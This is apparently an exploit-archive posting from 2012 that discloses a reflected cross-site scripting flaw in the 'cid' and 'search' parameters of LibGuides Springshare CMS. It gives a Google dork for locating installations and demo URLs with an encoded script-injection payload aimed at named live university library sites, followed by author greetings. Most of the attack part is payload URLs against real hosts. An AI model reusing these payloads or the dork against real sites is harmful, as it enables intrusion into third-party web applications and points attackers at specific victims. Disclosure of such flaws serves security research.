LibGuides Springshare CMS suffers from a cross site scripting vulnerability.
54540511dcf24fa025e39a3ae5c0571232a9e80bd4abf5035274fcdbe07e437e
###################################################################################
# Exploit Title: LibGuides springshare Cms Cross Site Scripting Vulnerability
#
# Google Dork: intext:"Powered by Springshare"
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Vendor Home : http://springshare.com/libguides/
#
# Tested on: all
#
###################################################################################
======================================
parametrs cid in cat.php file and search in mobile.php file are Vulnerable to
coss site Scripting
D3M0 :
http://millerlibrary.washcoll.edu/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
http://libguides.mit.edu/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
http://libguides.library.ohiou.edu/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
http://millerlibrary.washcoll.edu/mobile.php?action=8&gid=&iid=145&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir